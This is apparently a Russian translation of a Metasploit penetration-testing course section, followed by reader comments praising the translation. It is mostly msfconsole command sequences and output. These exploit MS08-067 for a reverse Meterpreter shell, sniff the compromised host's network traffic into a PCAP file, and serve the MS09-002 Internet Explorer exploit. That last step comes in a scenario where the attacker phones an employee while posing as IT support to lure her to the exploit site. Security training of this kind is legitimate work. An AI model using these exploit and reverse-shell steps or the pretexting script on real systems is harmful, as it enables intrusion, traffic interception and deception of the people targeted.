Перехват пакетов в сети с помощью Meterpreter.
Во время написания данного курса, H.D. Moore расширил функциональность Metasploit Framework. Meterpreter теперь имеет возможность перехвата пакетов удаленного хоста, не оставляя следов на жестком диске. Это особенно полезно, если мы хотим контролировать тип передаваемой информации и с помощью вспомогательных модулей помещать перехваченные пакеты в cap файлы с результатами. Модуль сниффера может хранить в буфере до 200000 пакетов с последующим экспортом в стандартный формат PCAP, так что вы можете обработать их с использованием psnuffle, Dsniff, Wireshark и т.д.
Первым выстрелом — проэксплуатируем уязвимость на удаленном хосте, получив стандартную reverse Meterpreter консоль к удаленной системе.
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.211.55.126 msf exploit(ms08_067_netapi) > set RHOST 10.10.1.119 msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.119:1921)
Затем запустим сниффер на интерфейсе 1 и начнем сбор пакетов. Вывод с результатами работы сниффера разместим в /tmp/all.cap.
meterpreter > use sniffer Loading extension sniffer...success. meterpreter > help Sniffer Commands ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data sniffer_interfaces List all remote sniffable interfaces sniffer_start Capture packets on a previously opened interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet captures on the specified interface meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) meterpreter > sniffer_start 1 [*] Capture started on interface 1 (200000 packet buffer) meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 19 packets to PCAP file /tmp/all.cap meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 199 packets to PCAP file /tmp/all.cap
Теперь можно воспользоваться анализатором пакетов, для представления о передаваемой информации.
Meterpreter packet sniffer для работы использует MicroOLAP Packet Sniffer SDK и может сниффать пакеты на зараженном компьютере даже не имея установленных драйверов и доступа записи в файловую систему. Модуль достаточно «умен», чтобы реализовывать поставленные задачи, и будет автоматически удалять любой трафик от взаимодействия с Meterpreter. Кроме того Meterpreter «гонит» всю собранную информацию по зашифрованному SSL/TLS туннелю.
Pivoting.
Pivoting является уникальной техникой, с помощью которой атакующий может продвигаться от машины к машине внутри не маршрутизируемой сети.
Для примера, предположим, что вы являетесь экспертом по безопасности в компании Security-R-Us. Вы нашли в каталоге компании служащую Мэри Джо Свенсон. По номеру телефона, который вы так-же выяснили, связываетесь с Мэри и убеждаете ее, что вы из службы информационных технологий, просите ее обновить систему перейдя на указанный сайт обновлений. Она переходит на ваш сайт, а вы пользуетесь последней уязвимостью в Internet Explorer.
msf > use windows/browser/ms09_002_memory_corruption msf exploit(ms09_002_memory_corruption) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 80 yes The local port to listen on. SSL false no Use SSL URIPATH / no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms09_002_memory_corruption) > set URIPATH / URIPATH => / msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(ms09_002_memory_corruption) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 80 yes The local port to listen on. SSL false no Use SSL URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/patchupmeterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > set LHOST 10.10.1.109 LHOST => 10.10.1.109 msf exploit(ms09_002_memory_corruption) > set LPORT 8080 LPORT => 8080 msf exploit(ms09_002_memory_corruption) > exploit -j [*] Exploit running as background job. msf exploit(ms09_002_memory_corruption) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://10.10.10.243:80/ [*] Server started.
Уже седьмая часть перевода курсов и ни одного комментария по качеству перевода и стоит ли переводить дальше :)Обращаюсь к тем кто все это читает, помимо меня, если есть исправления предлагайте, будем переводить вместе ;)
Отличные статьи (перевод), читаю запоем, не могу оторваться.
Зачет и медаль тому человеку, кто все это делает.
Отлично, благодарю за отзыв, буду продолжать переводить :)
Чувак респект тебе за твой статьи очень интересно мне понравилось очень продолжай в том же духе, я давно искал подобное большое спасибо.
Огромный РЕСПЕКТ автору !!!!!!!!!!
Перевод мануала отличный, ждём продолжения….